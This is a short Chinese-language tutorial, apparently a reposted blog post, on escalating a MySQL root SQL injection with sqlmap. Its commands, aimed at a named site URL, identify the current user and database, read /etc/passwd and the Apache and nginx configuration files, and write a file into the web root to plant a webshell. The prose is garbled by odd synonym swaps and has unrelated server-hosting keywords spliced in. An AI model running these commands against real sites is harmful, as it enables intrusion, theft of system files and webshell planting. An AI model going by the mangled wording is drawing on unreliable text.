碰著一mysql root權(quán)限注入點(diǎn),實(shí)驗(yàn)用sqlmap進(jìn)一步滲透獲取更高權(quán)限,東亞服務(wù)器 臺(tái)灣服務(wù)器,詳細(xì)如下:
判定注入點(diǎn)的當(dāng)前用戶和當(dāng)前數(shù)據(jù)庫(kù)
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db
root權(quán)限注入點(diǎn)可以實(shí)驗(yàn)讀取系統(tǒng)文件,好比/etc/passwd,以及apache,nginx的設(shè)置文件等,相關(guān)設(shè)置文件路徑如下:
nginx: usr/local/nginx/conf/nginx.conf
常用的apache設(shè)置文件路徑有:
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
sqlmap讀取文件語(yǔ)法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"
假如magic_quotes_gpc=off就可以實(shí)驗(yàn)舉辦寫(xiě)入Webshell,sqlmap寫(xiě)入文件語(yǔ)法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt
將當(dāng)?shù)氐膖est.txt寫(xiě)入到站點(diǎn)處事器的html目次下。